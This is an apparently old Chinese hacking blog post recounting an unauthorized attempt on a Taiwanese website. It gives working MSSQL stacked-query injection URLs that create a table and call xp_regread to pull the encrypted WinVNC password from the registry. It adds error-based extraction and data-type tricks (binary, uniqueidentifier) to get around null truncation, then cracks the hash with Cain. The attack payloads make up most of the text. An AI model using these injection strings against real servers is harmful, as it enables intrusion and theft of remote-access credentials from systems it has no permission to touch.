相信大家對(duì)ASP+MSSQL注入都已經(jīng)很熟悉了，連一個(gè)對(duì)SQL語(yǔ)法絲毫不懂的人也可以用NBSI來(lái)輕松入侵大量網(wǎng)站。但就算是一個(gè)SQL INJECTION高手，如果針對(duì)在MSSQL中只有db_owner角色,破不出猜不到網(wǎng)站后臺(tái)的情況下，好像也無(wú)技可施；除了用備份得到shell的這個(gè)思路，我在網(wǎng)上實(shí)在沒(méi)有找出更好的入侵辦法。不過(guò)，備份得到的shell只是理論化的東東，如果一個(gè)webshell有20mb的話，你還能用它嗎？前不久，我就碰到了這樣的一個(gè)臺(tái)灣網(wǎng)站，管理員的密碼倒是用NBSi跑了出來(lái)，可是用戶名因?yàn)槭欠斌w的原因在NBSi中成了一堆亂碼。我也找到了后臺(tái)，可只有干瞪眼的份。怎么辦？我又掃了它的所有端口，發(fā)現(xiàn)開(kāi)了5900，估計(jì)是管理員用了VNC對(duì)服務(wù)器進(jìn)行了遠(yuǎn)程控制。這時(shí)，我就有一個(gè)思路，能不能把 VNC在注冊(cè)表的加密密碼讀出來(lái)再來(lái)破解呢？看我表演吧！
TELNET服務(wù)器的5900端口，得到訊息證實(shí)服務(wù)器的確用的是VNC。
相信大家都會(huì)用讀xp_regread來(lái)讀注冊(cè)表了，依次提交如下語(yǔ)句：
http://www.something.com/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][char](255));
這樣我們就成功地建了一個(gè)名為cyfd的表，并且添加了類型是char，長(zhǎng)度為255的字段名gyfd。然后向表中加數(shù)據(jù):
_blank>http://www.something.com/script.asp?id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
從注冊(cè)表中讀出VNC在注冊(cè)表的加密密碼的值，再把值插入到剛建的表中。然后暴出VNC在注冊(cè)表的加密密碼：
_blank>http://www.something.com/script.asp?id=2 and 1=(select count(*) from cyfd where gyfd > 1)。
可是結(jié)果大失我所望，gyfd的值是空的。如果這樣容易的話，不會(huì)有這篇文章出現(xiàn)了。這是什么原因呢？我的語(yǔ)法不正確？翻來(lái)覆去的檢查我的語(yǔ)句也沒(méi)有發(fā)現(xiàn)錯(cuò)誤呀。難道繁體的vnc在注冊(cè)表里的位置不一樣？后來(lái)我又開(kāi)始在本機(jī)裝了vnc又在分析查循器里做測(cè)試，得到的結(jié)果卻是個(gè)數(shù)字5。這時(shí)czy上線了，詢問(wèn)了一下，他勸我把gyfd的這個(gè)字段改成二進(jìn)制數(shù)據(jù)類型 binary來(lái)試一下。于是我又在本機(jī)測(cè)試了一下，依次提交如下語(yǔ)句：
　http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][binary](20));
http://127.0.0.1/script.asp?id=2;DECLARE @result binary(20) EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
然后我再用nbsi跑出cyfd表里gyfd這個(gè)字段的值。結(jié)果到是出來(lái)了，得到了vnc的加密密碼值是 0x0E3515AC00000000000000000000000000000000。可這兒還不對(duì)，我在本機(jī)裝的vnc在注冊(cè)表里的密碼值是 hex:0e,35,15,ac,00,62,d3,08這個(gè)呀。原來(lái)binary(n)的數(shù)據(jù)存儲(chǔ)長(zhǎng)度是固定的，當(dāng)輸入的二進(jìn)制長(zhǎng)度小于n時(shí)，余下長(zhǎng)度填0補(bǔ)充。我在注入語(yǔ)句中寫(xiě)入的binary(20)是足夠?qū)懭雟nc加密密碼的長(zhǎng)度時(shí)，為什么還有那么多0來(lái)填充呢？這是因?yàn)檎梦业膙nc密碼是 0e3515ac0062d308，在碰到了00的情況下，xp_regread以為已經(jīng)讀完了它的值呢，把00當(dāng)成了結(jié)束符，所以只讀到了 0x0E3515AC，我暈！
翻了一下書(shū)，終于讓我找到了一個(gè)特殊的數(shù)據(jù)類型uniqueidentifier，是用來(lái)存儲(chǔ)一個(gè)16字節(jié)長(zhǎng)的二進(jìn)制數(shù)據(jù)類型。把注入語(yǔ)句改造一下：
　http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][uniqueidentifier]);
　http://127.0.0.1/script.asp?id=2;DECLARE @result uniqueidentifier EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
然后再用nbsi跑一下，跑出來(lái)了，不過(guò)得到的結(jié)果是AC15350E-6200-08D3-0000-000000000000。
AC15350E-6200-08D3-0000-000000000000和我在注冊(cè)表里的正確的vnc密碼的值0e3515ac0062d308 相比，能看出來(lái)有什么不同嗎？只不過(guò)順序是顛倒的，相信大家都會(huì)小學(xué)的算術(shù)，這個(gè)不用我教了。試一下用cain破出vnc的密碼，看看行不行。
看樣子在本機(jī)做的測(cè)試一切成功。這方法用到臺(tái)灣上的站點(diǎn)試試，哎，依然沒(méi)有跑出vnc的密碼，也許繁體vnc在注冊(cè)表的位置不同吧。不過(guò)，我研究了一上午，有了一點(diǎn)收獲，就放過(guò)你吧。